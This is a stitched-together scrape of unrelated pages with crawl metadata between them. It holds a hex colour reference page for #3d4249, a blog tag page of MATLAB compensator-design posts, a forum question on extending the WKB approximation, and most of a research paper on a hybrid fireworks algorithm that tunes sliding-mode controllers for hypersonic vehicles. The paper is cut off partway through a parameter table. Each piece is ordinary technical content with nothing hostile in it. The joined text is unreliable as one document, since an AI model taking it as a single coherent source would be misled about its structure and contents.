#3d4549\n``#3d4549` `rgb(61,69,73)``\n• #3d4449\n``#3d4449` `rgb(61,68,73)``\n• #3d4349\n``#3d4349` `rgb(61,67,73)``\n• #3d4249\n``#3d4249` `rgb(61,66,73)``\n• #3d4149\n``#3d4149` `rgb(61,65,73)``\n• #3d4049\n``#3d4049` `rgb(61,64,73)``\n• #3d3f49\n``#3d3f49` `rgb(61,63,73)``\nSimilar Colors\n\n# #3d4249 Preview\n\nThis text has a font color of #3d4249.\n\n``<span style=\"color:#3d4249;\">Text here</span>``\n#3d4249 background color\n\nThis paragraph has a background color of #3d4249.\n\n``<p style=\"background-color:#3d4249;\">Content here</p>``\n#3d4249 border color\n\nThis element has a border color of #3d4249.\n\n``<div style=\"border:1px solid #3d4249;\">Content here</div>``\nCSS codes\n``.text {color:#3d4249;}``\n``.background {background-color:#3d4249;}``\n``.border {border:1px solid #3d4249;}``\n\n# Shades and Tints of #3d4249\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #070809 is the darkest color, while #fdfdfd is the lightest one.\n\n• #070809\n``#070809` `rgb(7,8,9)``\n• #101214\n``#101214` `rgb(16,18,20)``\n• #191b1e\n``#191b1e` `rgb(25,27,30)``\n• #222529\n``#222529` `rgb(34,37,41)``\n• #2b2f34\n``#2b2f34` `rgb(43,47,52)``\n• #34383e\n``#34383e` `rgb(52,56,62)``\n• #3d4249\n``#3d4249` `rgb(61,66,73)``\n• #464c54\n``#464c54` `rgb(70,76,84)``\n• #4f555e\n``#4f555e` `rgb(79,85,94)``\n• #585f69\n``#585f69` `rgb(88,95,105)``\n• #616974\n``#616974` `rgb(97,105,116)``\n• #6a727e\n``#6a727e` `rgb(106,114,126)``\n• #737c89\n``#737c89` `rgb(115,124,137)``\n• #7d8692\n``#7d8692` `rgb(125,134,146)``\n• #88909b\n``#88909b` `rgb(136,144,155)``\n• #929aa4\n``#929aa4` `rgb(146,154,164)``\n``#9da4ad` `rgb(157,164,173)``\n• #a8aeb6\n``#a8aeb6` `rgb(168,174,182)``\n• #b2b8bf\n``#b2b8bf` `rgb(178,184,191)``\n• #bdc2c8\n``#bdc2c8` `rgb(189,194,200)``\n• #c8ccd1\n``#c8ccd1` `rgb(200,204,209)``\n• #d2d6da\n``#d2d6da` `rgb(210,214,218)``\n• #dddfe3\n``#dddfe3` `rgb(221,223,227)``\n• #e8e9ec\n``#e8e9ec` `rgb(232,233,236)``\n• #f3f3f5\n``#f3f3f5` `rgb(243,243,245)``\n• #fdfdfd\n``#fdfdfd` `rgb(253,253,253)``\nTint Color Variation\n\n# Tones of #3d4249\n\nA tone is produced by adding gray to any pure hue. In this case, #424344 is the less saturated color, while #043982 is the most saturated one.\n\n• #424344\n``#424344` `rgb(66,67,68)``\n• #3d4249\n``#3d4249` `rgb(61,66,73)``\n• #38414e\n``#38414e` `rgb(56,65,78)``\n• #334053\n``#334053` `rgb(51,64,83)``\n• #2e3f58\n``#2e3f58` `rgb(46,63,88)``\n• #283f5e\n``#283f5e` `rgb(40,63,94)``\n• #233e63\n``#233e63` `rgb(35,62,99)``\n• #1e3d68\n``#1e3d68` `rgb(30,61,104)``\n• #193c6d\n``#193c6d` `rgb(25,60,109)``\n• #143b72\n``#143b72` `rgb(20,59,114)``\n• #0f3a77\n``#0f3a77` `rgb(15,58,119)``\n• #09397d\n``#09397d` `rgb(9,57,125)``\n• #043982\n``#043982` `rgb(4,57,130)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #3d4249 is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.53067744,"math_prob":0.610049,"size":3669,"snap":"2021-43-2021-49","text_gpt3_token_len":1644,"char_repetition_ratio":0.12332878,"word_repetition_ratio":0.011070111,"special_character_ratio":0.5671845,"punctuation_ratio":0.23344557,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9897669,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-27T08:19:01Z\",\"WARC-Record-ID\":\"<urn:uuid:023b9055-db6b-41ce-8f9f-46e93b67145d>\",\"Content-Length\":\"36105\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cde2f515-7cda-4763-89b0-9647e5dbe579>\",\"WARC-Concurrent-To\":\"<urn:uuid:61926681-e684-4339-a34e-819f0c6a55cf>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/3d4249\",\"WARC-Payload-Digest\":\"sha1:GZXGKDNQBJTSDX6EM5OIZ6IKCYPR4OLE\",\"WARC-Block-Digest\":\"sha1:XQL3DBQXXL2HIXLXKL3WVVB66LLYSWWQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323588102.27_warc_CC-MAIN-20211027053727-20211027083727-00686.warc.gz\"}"}
https://thebeautifullmind.com/tag/matlab-script/
[ "# Lead Compensator design with Root Locus\n\nThis has been the most difficult part for me since I started writting this series. I took one whole day to figure out how to write a program to designa lead compensator with rot locus in matlab. For those who have followed my previous posts will know by now what the compensators are. As said …\n\n# Lead Compensator design with Bode plot\n\nIntroduction to Matlab Lag Compensator with Bode Plot Lag Compensator with root locus So far we have seen the design of lag compensators, now we move on to lead compensators which help in improving the transient response. We will start from the frequency domain design using bode plot. Here I would like to tell the …\n\n# Lag Compensator design with Root Locus\n\nSo far we have discussed on an Introduction to Matlab and Lag compensator design with bode plot. In this post we will deal with lag compensator design with time domain specifications and using the root locus technique. The steps to design the lag Compensator are Draw the root locus of the given open loop uncompensated …\n\nContinue reading Lag Compensator design with Root Locus\n\n# Lag Compensator design with Bode plot\n\nIn the previous post  An Introduction to compensator Design with matlab we saw an introduction to compensators. In this post we will deal with lag compensator design with frequency domain specifications. The steps to design the lag Compensator are Determine K from the error constatns given Sketch the bode plot Determine phase margin if it is not …\n\nContinue reading Lag Compensator design with Bode plot" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90638167,"math_prob":0.7203686,"size":1418,"snap":"2022-27-2022-33","text_gpt3_token_len":303,"char_repetition_ratio":0.20792079,"word_repetition_ratio":0.10699589,"special_character_ratio":0.18406206,"punctuation_ratio":0.04330709,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9745547,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-05T09:54:36Z\",\"WARC-Record-ID\":\"<urn:uuid:b78d858d-c98c-48c1-8100-ed29fc710b4b>\",\"Content-Length\":\"100935\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c8aee2e8-8e5f-4ee7-99dc-9132e20528b6>\",\"WARC-Concurrent-To\":\"<urn:uuid:286bfe67-cfb9-46f0-979f-dd957537b0f8>\",\"WARC-IP-Address\":\"192.0.78.24\",\"WARC-Target-URI\":\"https://thebeautifullmind.com/tag/matlab-script/\",\"WARC-Payload-Digest\":\"sha1:HNHBTT5VVBWT4YBOAYXZPS4HADAC62WO\",\"WARC-Block-Digest\":\"sha1:6IP73M7O6262HSD63XO7B2HQMLE2QGD3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104542759.82_warc_CC-MAIN-20220705083545-20220705113545-00167.warc.gz\"}"}
https://www.physicsforums.com/threads/beyond-wkb.167813/
[ "# Beyond WKB\n\n## Main Question or Discussion Point\n\nIf in 1-D the WKB wave and energy quantization are:\n\n$$\\Psi (x) = e^{iS(x)/\\hbar}$$ and $$\\oint_C dq p =2\\pi (n+1/2) \\hbar$$\n\nMy question is what happens with more than one dimension ?? (many body system or 3-D system), what happens with QFT ?? i know that as an analogy you could always put the WKB wavefunction in the form:\n\n$$\\Psi [\\phi] = e^{iS[\\phi]/\\hbar}$$\n\nbut what happens with the energies??..i know this must/can be used when delaing Semiclassical Quantum Gravity won't it ??" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8492347,"math_prob":0.9939359,"size":1017,"snap":"2020-24-2020-29","text_gpt3_token_len":325,"char_repetition_ratio":0.12734452,"word_repetition_ratio":0.85057473,"special_character_ratio":0.32153392,"punctuation_ratio":0.11682243,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9905639,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-15T11:31:13Z\",\"WARC-Record-ID\":\"<urn:uuid:77db2e33-b6cf-488b-b04e-870b23cc90f9>\",\"Content-Length\":\"61567\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3db1c5af-bf83-46ef-b08c-4069ca5def42>\",\"WARC-Concurrent-To\":\"<urn:uuid:bc6cbc17-847e-403b-82e8-5769772f5268>\",\"WARC-IP-Address\":\"23.111.143.85\",\"WARC-Target-URI\":\"https://www.physicsforums.com/threads/beyond-wkb.167813/\",\"WARC-Payload-Digest\":\"sha1:A3C3YGPXCYR4CEYE3UFGD23CT2EYWWUV\",\"WARC-Block-Digest\":\"sha1:3YJG65MVO4NBGOGMOYEATXFMSBHOFX5K\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593657167808.91_warc_CC-MAIN-20200715101742-20200715131742-00497.warc.gz\"}"}
https://www.hindawi.com/journals/complexity/2018/9098151/
[ "/ / Article\nSpecial Issue\n\n## Computational Intelligence in Modeling Complex Systems and Solving Complex Problems\n\nView this Special Issue\n\nResearch Article | Open Access\n\nVolume 2018 |Article ID 9098151 | https://doi.org/10.1155/2018/9098151\n\nXiaomeng Yin, Xing Wei, Lei Liu, Yongji Wang, \"Improved Hybrid Fireworks Algorithm-Based Parameter Optimization in High-Order Sliding Mode Control of Hypersonic Vehicles\", Complexity, vol. 2018, Article ID 9098151, 16 pages, 2018. https://doi.org/10.1155/2018/9098151\n\n# Improved Hybrid Fireworks Algorithm-Based Parameter Optimization in High-Order Sliding Mode Control of Hypersonic Vehicles\n\nAccepted31 Jan 2018\nPublished04 Mar 2018\n\n#### Abstract\n\nWith respect to the nonlinear hypersonic vehicle (HV) dynamics, achieving a satisfactory tracking control performance under uncertainties is always a challenge. The high-order sliding mode control (HOSMC) method with strong robustness has been applied to HVs. However, there are few methods for determining suitable HOSMC parameters for an efficacious control of HV, given that the uncertainties are randomly distributed. In this study, we introduce a hybrid fireworks algorithm- (FWA-) based parameter optimization into HV control design to satisfy the design requirements with high probability. First, the complex relation between design parameters and the cost function that evaluates the likelihood of system instability and violation of design requirements is modeled via stochastic robustness analysis. Subsequently, we propose an efficient hybrid FWA to solve the complex optimization problem concerning the uncertainties. The efficiency of the proposed hybrid FWA-based optimization method is demonstrated in the search of the optimal HV controller, in which the proposed method exhibits a better performance when compared with other algorithms.\n\n#### 1. Introduction\n\nHypersonic vehicles (HVs) have attracted increasing interest given their characteristics of high speed and excellent cost effectiveness to access the space. HVs usually fight in near space at a high speed, in which the aerodynamic properties are difficult to predict . Additionally, owing to the peculiar structure of HVs, the couplings related to aerodynamics, propulsion, and structural dynamics are strong, and this makes HV sensitive to uncertainties . In this study, we focus on the efficacious control design of nonlinear HV dynamics given that uncertainties are randomly distributed.\n\nAs members of sliding mode control methods , high-order sliding mode control (HOSMC) methods exhibit strong robustness and a reduced chattering effect while dealing with uncertainties. For example, Zhang et al. proposed a quasi-continuous HOSMC for HV to effectively alleviate the chattering phenomena. In addition to the chattering effect, several design requirements also should be considered for practical HV control under the effects of uncertainties. The priority is guaranteeing the stability. Furthermore, in order to ensure a satisfactory control performance, high-accuracy tracking of trajectory commands and lower fuel consumption are desired. However, when uncertainties are involved in the nonlinear control structure of HV, it is a challenge to adjust design parameters to reach a satisfied level of tracking performance. Two problems have appeared because of introducing uncertainties into the HOSM control of HV.\n\nThe first problem is that the modeling of the relation between the design parameters and the HV tracking performance under the effect of uncertain parameters is complex. Dealing with uncertainty in a probabilistic way, stochastic robustness analysis (SRA) was first proposed by Stengel and Ray , and it is an effective method to evaluate the extent to which the specified design requirements are satisfied. A cost function for SRA is formulated to estimate the likelihood that the design requirements are not satisfied. Subsequently, the design parameter space is searched to minimize the cost function to obtain the optimal performance in the presence of uncertainties . Cao et al. optimized the HV controller parameters by using SRA and hybrid PSO algorithm. However, only the dynamic response indices of step command were concerned in the cost function for SRA . In order to achieve a desired tracking performance despite uncertainties, it is necessary to introduce appropriate indices that characterize the command tracking process and corresponding indicator functions into the optimization problem modeling of HV.\n\nThe second important problem in the HOSM control of HV involves solving the optimization problem. Conventional optimization methods, such as the gradient search method, are no longer suitable given that the partial derivative of the cost function in SRA is difficult to obtain. For complex optimization problem involving uncertainties, a high efficiency computational intelligence optimization algorithm is required to determine the optimal controller parameters of HV to achieve a satisfied level of tracking performance under the influence of uncertainties. Nowadays, various computational intelligence techniques [14, 15], such as genetic algorithm (GA) , particle swarm optimization (PSO) , and differential evolutionary (DE), have been proposed for complex optimization problems with the development of computation technology.\n\nAmong computational algorithms, the fireworks algorithm (FWA) is a relatively new swarm intelligence-based algorithm proposed by Tan and Zhu . It simulates the process of fireworks explosion, in which the “good” fireworks generate more sparks in smaller explosion areas. Numerical experiments indicated that FWA converges to a global optimum with a smaller number of function evaluations than PSO and GA . Li et al. proposed an adaptive fireworks algorithm (AFWA) in which the explosion amplitude of fireworks that fails to produce a better spark increases. To improve interaction of solutions, hybrid algorithm of FWA-DE was developed by Zheng et al. . Zhang et al. proposed an improved FWA by enhancing fireworks interaction. With respect to improvements in the FWA , it is recognized that the diversification mechanism of FWA does not utilize more information on other qualified solutions in the swarm. Therefore, with respect to the HV control under uncertainties that are randomly distributed, it is necessary to develop an improved FWA with enhanced solutions interaction to effectively solve the complex optimization problem of searching for the optimal controller.\n\nIn this study, an improved hybrid FWA-based parameter optimization method is proposed for HV control to achieve an excellent tracking performance in the presence of uncertainties. The main contributions are as follows:\n\nThe uncertainties that are randomly distributed are considered in the modeling phase via SRA. The cost function evaluating the probability of design requirements violation is formulated to model the complex relation between design parameters and tracking performance of the uncertain HV system. Appropriate indices of the command tracking response are developed.\n\nA hybrid FWA to search for the optimal design parameters is proposed for the complex optimization problem involving uncertainties to satisfy design requirements with high probability. The introduction of the hybrid FWA into SRA effectively optimizes the tracking performance of the nonlinear HV system under uncertainties.\n\nThis study is organized as follows: In Section 2, the optimization problem in the HOSM control of HV is introduced. In Section 3, the complex relation between design parameters and HV performance under uncertainties is modeled. Section 4 proposes a new hybrid FWA to determine the optimal parameters of HV. Section 5 investigates the global convergence of the proposed hybrid FWA, and the simulation and comparison results are demonstrated. A few conclusions are made in Section 6.\n\n#### 2. HOSM Control Structure of HV with Uncertainties\n\nThe control-oriented model of a generic hypersonic vehicle (HV) is described by . An inverse-square-law gravitational model and centripetal acceleration are considered, and the dynamic differential equations for velocity , altitude , flight-path angle , angle of attack , and pitch rate of HV are as follows:withwhere is the lift, is the drag, is the thrust, and is the pitching moment. , , , , and denote the mass, radial distance, radius of the Earth, gravitational constant, and density of air, respectively. Additionally, , , and denote the reference area, mean aerodynamic chord, and the moment of inertia about -body axes, respectively. denotes the elevator deflection, and denotes the engine throttle setting.\n\nThe thrust in (2) is provided by the engine dynamics, and this is represented as follows :where denotes the engine throttle setting command. It is adopted that and for proper modeling of engine dynamics.\n\nIn order to guarantee the robustness of the HV flight control system, the parametric uncertainties in (1)-(2) are considered as follows:where the uncertainties , , , , , and are bounded.\n\nHV system (1) with engine dynamics is highly nonlinear. The relationship between input variables and the output variables is apparently expressed by the feedback linearization method . We differentiate three times and differentiate four times, and we obtain the following expressions:where , , , and , .\n\nIn order to force the velocity and altitude to track the time-varying commanded output , we define the velocity sliding tracking error and the altitude sliding tracking error as and , respectively. Based on (5) and (7), we havewhere the formulations of , , , , , and are the same as those in .\n\nAs stated in , the matrix in (9) is nonsingular over the entire flight envelope of HV, so (9) is decoupled with the auxiliary control input as follows:\n\nA previous study indicates that if appropriate control parameters are designed, then the finite time stabilization of system (9) is guaranteed by the quasi-continuous HOSMC and , and this is given as follows:with\n\nThe HV control structure based on HOSM is shown in Figure 1.\n\nFor the quasi-continuous HOSM controller (11), the design parameters and define the output trajectory of the HV system, which is shown in Figure 2. In the figure, altitude commands are in the dotted lines, and tracking trajectories are in the solid lines. In order to satisfy the design requirements, it is necessary to optimize the controller parameters.\n\nFurthermore, it is more appealing to satisfy the HV control design requirements under the effects of uncertainties. In Figure 3, the tracking trajectories with uncertain parameters generated randomly are depicted by the solid lines, and the altitude commands are shown by the dotted lines. Within two dashed lines are the trajectories that meet the design requirements.\n\nThe simulations indicate that the same set of design parameters will generate various trajectories in the presence of uncertainties. Therefore, it is necessary to employ a proper measure to quantify a set of data values. In this study, the probability that the design requirements are not satisfied is used for the HV performance evaluation with uncertainties.\n\nTherefore, the target of HV control design involves determining the optimal HOSM control parameters to satisfy design requirements with high probability. It is necessary to solve the following two problems in the HOSM parameter optimization: to develop a cost function that evaluates the likelihood of system instability and the violation of the design requirements, so that the complex relation between HV design parameters and the performance under uncertainties is modeled; to solve the complex optimization problem related to the uncertainties by a high efficient computational intelligence optimization algorithm.\n\n#### 3. Stochastic Robustness Analysis of HV\n\nThe concept of stochastic robustness was proposed by Stengel and Ray , and this is effective in evaluating the extent to which the specified design requirements are satisfied. We deal with uncertainties in a probabilistic way, and thus a cost function to evaluate the likelihood of system instability and the violation of design requirements is formulated via SRA.\n\nThe flowchart of HOSM control design for HV based on SRA is shown in Figure 4.\n\nIn Figure 4, a closed-loop HV system with uncertain parameters is denoted by the dotted box. denotes the indicator function corresponding to the design requirement. The value of is within , and this is 0 if an acceptable performance appears and is 1 otherwise.\n\nWith the indicator function , the probability of satisfying a certain performance requirement is defined by an integral of the corresponding indicator function over the expected variation space of parametric uncertainties. It is a practical method to estimate the probability by Monte Carlo evaluation (MCE) as follows:where represents the HV system with uncertain parameters that are randomly selected within the parameter space . represents the HOSM controller with the design parameter vector , and denotes the sampling numbers.\n\nThus, the cost function for SRA is formed by combining the probability of various design requirements with weights as follows:where the estimated value of the cost function approaches the true value when the sampling number .\n\nAs shown in Figure 4, the optimal design parameters of HV are determined under the guidance of the cost function . Therefore, it is vital to define appropriate stochastic robustness measurements for the cost function to achieve the desired tracking performance despite uncertainties.\n\n##### 3.1. Stochastic Robustness Indices and Indicators\n\nIn this section, the stochastic robustness indices and indicators are introduced to evaluate the HV tracking performance in the presence of uncertainties.\n\nAccording to the requirements of HV control design, the first index is set to guarantee system stability in the presence of uncertainties. Additionally, it is necessary to develop performance indices to characterize the command tracking trajectories of HV. The tracking trajectory of a general reference signal is not standardized as that of step signal, and thus common indices, such as setting time, overshoot, and steady error, are no longer suitable. Thus, the following performance indices are introduced.(i)Transient tracking performance:where and represent the transient tracking performance indices for the altitude response and the velocity response, respectively. is the terminal time of the tracking command. and are small positive constants that define the duration of the interested transient stage. A decrease in the value of decreases the tracking error in the transient stage.(ii)Steady tracking performance:where and represent the steady tracking performance indices for the altitude response and the velocity response, respectively. A decrease in the value of decreases the tracking error in the steady stage.(ii)Fuel consumption performance:where and represent the fuel consumption performance indices for the altitude response and the velocity response, respectively. denotes engine throttle setting during the flight. It is necessary to limit within reasonable bounds.(iv)Chattering effect:where denotes the time when the sliding tracking errors and both tend to zero. and represent the maximum chatter amplitude of elevator for the altitude and velocity commands when , respectively. The chattering effect can severely deteriorate the flight control performance, and thus it is necessary to attenuate it.\n\nThrough Monte Carlo sampling, the distribution of aforementioned index values is obtained from the tracking trajectories under uncertainties. In Figure 5, after 200 times of random sampling, the distributions corresponding to the altitude tracking performance indices are shown. In order to evaluate the extent to which the design requirements are satisfied in the presence of uncertainties, the indicator function corresponding to the index should be carefully defined.\n\nThe commonly used indicator is a binary function with two values of 0 and 1 to represent whether the design requirement is satisfied or not. However, for a practical engineering system, there exists an interval between the satisfied and unsatisfied performance. Thus, the following continuous function is employed as the indicator as follows:where denotes the value of the performance index, such as , and , . The positive constant represents , , , or . The positive constant represents , , , or , and and are set by the designer to define the interval between the satisfied and unsatisfied performance.\n\n##### 3.2. Optimization Problem\n\nIn order to evaluate the HV tracking performance under uncertainties, the aforementioned indices and indicator functions are employed to formulate the cost function in (14), and they are listed in Table 1.\n\n Metric number Weight in Indicator function Design requirements 1 10.0 (10.0) System stability in altitude response (velocity response) 3 1.0 (1.0) Transient tracking performance in altitude (velocity) response is less than () 5 1.0 (1.0) Steady tracking performance in altitude (velocity) response is less than () 7 1.0 (1.0) Fuel consumption performance in altitude (velocity) response is less than () 9 0.5 (0.5) Chattering effect in altitude (velocity) response is less than ()\n\nBy formulating the cost function , the complex relation between the HOSM controller parameters and the HV tracking performance under uncertainties is modeled. The optimal controller parameters are obtained by solving the following optimization problem:where is the design parameter vector in the HV controller (11), and this is searched within . denotes the weights for the probabilities of various design requirements. The weight in cost function allows a trade-off between design requirements.\n\nOptimization problem (20) is a constrained nonlinear and nonconvex optimization problem, in which the cost function value is calculated with the Monte Carlo method. It is very difficult and time-consuming to determine the optimal solution.\n\nTherefore, for complex optimization problem (20) related to the uncertainties, it is necessary to develop a high efficient computational intelligence optimization algorithm to determine the optimal HV control parameters, so that an excellent tracking performance can be achieved despite uncertainties.\n\n#### 4. Optimization Technique with Improved Hybrid Fireworks Algorithm\n\nIn this section, we propose a hybrid FWA to solve the complex optimization problem of determining the optimal HV control parameters under uncertainties. First, by introducing the GA operators into the mutation process of AFWA, a hybrid FWA is developed with an improved diversification mechanism. Subsequently, the process of the hybrid FWA-based parameter optimization method is illustrated.\n\nInspired by the fireworks explosion, FWA is a relatively new swarm intelligence-based algorithm proposed by Tan and Zhu . In FWA, the fireworks and sparks are considered as the potential solutions in the search space, and the explosion is viewed as a local search around the location of fireworks. The FWA converges to a global optimum with a lower number of function evaluations than those of the PSO and GA . Subsequently, the AFWA was developed to improve the local search capability of the best firework.\n\nThe search process of AFWA is as follows:(1)Initialization: randomly set the initial locations of fireworks.(2)Explosion: each firework generates a set of sparks by executing the regular explosion operation.(3)Gaussian mutation: select a few fireworks randomly, and execute the Gaussian explosion (mutation) operation on the selected fireworks to generate several sparks.(4)Adaptive amplitude calculation: select the best individual as a firework in the next generation, and calculate its adaptive explosion amplitude.(5)Selection: randomly select other fireworks from all individuals.(6)Return to Step   until the stop criterion is fulfilled.\n\nIn order to execute the regular explosion operation in Step  , the number of sparks of each firework is calculated as follows:\n\nThe explosion amplitude is as follows:where is the number of fireworks. and are two parameters that control the number of sparks and explosion amplitude, respectively. represents the fitness value of , and and denote the maximum and minimum values of the cost function among the fireworks, respectively. A small constant is to avoid zero-division error.\n\nIn order to avoid the overwhelming effect of the best firework, the bound of the spark number is set as follows:where and are the upper and lower bounds for .\n\nFor a -dimension problem, after the calculation of spark number and explosion amplitude, the location of each spark is obtained by randomly setting approximately half of the dimensions (z dimensions), and for each dimension , the value (, ) is set based on (). Therefore, the locations of the explosion sparks are set as follows:\n\nIn order to maintain the diversity, for a few randomly selected fireworks, approximately half of the dimensions are selected to change. The mutation sparks are generated by adding a Gaussian distribution coefficient to as follows:where is the position of kth dimension of the best firework .\n\nIf the new locations of the newly generated sparks are beyond the search space, they are mapped within the search space as follows:where and denote the upper and lower bounds of the th dimension of the search space, respectively.\n\nIn order to improve the local search capability, the best individual is selected as a firework in the next generation. It has adaptive explosion amplitude calculated by selecting an individual that satisfies the following conditions: Its fitness is worse when compared with that of the best firework in the current generation. Its distance to the best individual is minimal among all individuals that satisfy . This is expressed as follows:where denotes all sparks; denotes the best individual among sparks and fireworks. is the best firework in the current generation, and represents the distance.\n\nThe adaptive amplitude of best firework in next generation is calculated as follows:where and are the adaptive amplitude in current generation and the next generation , respectively. is a positive constant (usually higher than 1), and represents the infinity norm.\n\nThe search process indicates that the diversification mechanism of FWA does not utilize more information on all the qualified solutions, and thus it is necessary to enhance the interaction between fireworks and sparks. It is well known that GA is an efficient evolutionary algorithm that performs searches by combining possible solutions in different directions . Additionally, GA exhibits potential parallelism, and thus individuals can be compared simultaneously. Therefore, we introduce GA into the mutation process of AFWA to generate more diverse and fitter solutions.\n\n##### 4.2. Hybrid Fireworks Algorithm with the Genetic Operator\n\nIn order to improve the search efficiency, the main idea in the proposed hybrid FWA involves utilizing all individuals (fireworks and sparks) to generate new individuals. In order to generate more diverse and fitter solutions, another idea involves selecting the father and mother from individuals with different features that correspond to “core individuals” and “noncore individuals.” Core individuals include the best firework and the sparks generated by the best firework. They exhibit better fitness values and closer locations. Noncore individuals include the other “bad” fireworks and sparks generated by them. They are more diverse.\n\nThe process of the genetic operator is given as follows:(1)Encoding: encode solutions to become chromosomes (individuals) with discrete units termed as genes.(2)Recombination pool construction: construct recombination pool with qualified individuals.(3)Parent selection: select parents from core individuals and noncore individuals, respectively.(4)Crossover and mutation also exist.\n\nThe process of the genetic operator is illustrated in Figure 6.\n\nThe steps in the genetic operator are stated in detail as follows.\n\n(i) Encoding. The -dimension solutions are encoded to -dimension chromosomes, in which each gene represents the value of corresponding dimension of a solution.\n\n(ii) Recombination Pool Construction. In order to improve the efficiency of crossover and mutation operations, two pools to select father and mother are constructed. The pool for the selection of the father is constructed by the core individuals from two sources, which include all the fathers ( fathers) in the last generation and several core individuals selected in the current generation ( core individuals). It aids in utilizing the information of the fitter individuals in a wider range. Similarly, the pool for the selection of the mother is constructed by all the mothers ( mothers) in the last generation and several noncore individuals selected in the current generation ( noncore individuals).\n\nWith respect to the core individuals that are fitter and located closer, a random selection is applied among them to construct the pool for father selection. Conversely, the noncore individuals are diverse. Therefore, a roulette wheel is employed to select the fitter ones to construct the pool for the selection of the mother.\n\nThe algorithm of constructing the recombination pool is shown in Algorithm 1.\n\n Construct the pool for the father selection as follows: All the fathers of the last generation ( fathers) are reserved in the pool. Randomly select core individuals in the current generation to join the pool. Construct the pool for the mother selection as follows: All the mothers of the last generation ( mothers) are reserved in the pool. Select noncore individuals in the current generation by the roulette wheel to join the pool.\n\n(iii) Parent Selection. The individuals from the current generation are preferred to select the parents with a higher probability of generating diverse and fitter offspring. In order to select fathers from pool, the fathers of the last generation are replaced by other individuals that have better fitness, and the remaining fathers of the last generation may be replaced by other individuals again with a probability of (). Mothers are selected in the same way as the fathers.\n\nThe algorithm of selecting parents is shown in Algorithm 2.\n\n Select fathers from the pool as follows: Replace the last generation’s fathers by other individuals in pool that have better fitness. Replace the remaining last generation’s fathers again with a probability (). Select mothers from pool as follows: Replace the last generation’s mothers by other individuals in pool that have better fitness. Replace the remaining last generation’s mothers again with a probability .\n\n(iv) Crossover and Mutation. The selected parents are randomly paired to exchange information to generate new two individuals. In the crossover, the tails of a pair of chromosomes (individuals) are swapped at a random point along the gene sequence with a crossover probability (). After the crossover, the gene in sequence is mutated. This means the offspring are obtained by randomly setting approximately of the dimensions of the individual within the search space, where denotes mutation probability ().\n\nThus, a new hybrid FWA is proposed by introducing the GA into the mutation process of AFWA. The flowchart of the proposed optimization algorithm is shown in Figure 7.\n\nHere and are the upper and the lower bounds of the search space, respectively.\n\n##### 4.3. Hybrid FWA-Based Parameter Optimization\n\nThe proposed hybrid FWA-based parameter optimization method combines the advantages of SRA and the hybrid FWA. By the SRA, the cost function is given to evaluate the HV tracking performance under uncertainties. Subsequently, the hybrid FWA is used to determine the optimal design parameters to satisfy the tracking performance requirements of HV with high probability. The flowchart of the proposed hybrid FWA-based parameter optimization method is given in Figure 8.\n\nTo illustrate the search process of the proposed hybrid FWA-based parameter optimization method in detail, the following steps are given:Generate several solutions by the hybrid FWA search process.(a)Randomly initialize a population of fireworks in the search space.(b)For each firework, generate explosion sparks within the explosion amplitude , and subsequently the positions of the explosion sparks are obtained.(c)Encode all individuals as chromosomes.(d)Select parents from all the chromosomes, and diverse individuals are generated via the genetic operator.Evaluate the solution’s fitness with the cost function in SRA.(a)With the stochastic robustness indices listed in Table 1 and the indicator function as defined in (19), calculate the indicator function value for the corresponding index.(b)By the Monte Carlo simulation, samples under uncertainties are generated to estimate the probability in which the design requirements of HV control are not satisfied.(c)For all the solutions generated in the search process, calculate the cost function in (20).Prepare for the next step searching.(a)After the evaluation of all solution’s fitness, the optimal solution is selected as a firework in the next generation. Its adaptive amplitude is calculated based on (28).(b)Randomly select fireworks among all the individuals.Check if the stop criterion is fulfilled.The optimal HOSM parameters are obtained, and an excellent HV tracking performance under uncertainties is achieved.\n\n#### 5. Simulation Study\n\n##### 5.1. Computational Intelligence Algorithm Test Cases\n\nIn this section, typical nonlinear benchmark functions in are employed to test the effectiveness of the proposed hybrid FWA. For the comparison, the GA, PSO, AFWA, and proposed hybrid FWA are run on the benchmarks for 300000 evaluations per function. Each experiment for testing algorithm is repeated 50 times.\n\nIn the testing, the parameters settings of algorithms are listed in Table 2.\n\n Algorithms Algorithm coefficients GA Population size: 200. Binary coded chromosome length: 10. Crossover probability: 0.7. Mutation probability: 0.015. PSO Particle number: 30. Inertia weight: . Learning factor: . AFWA Total sparks number: 200. Other parameters are the same as in . Hybrid FWA Genetic operator parameters: , , , and . Other 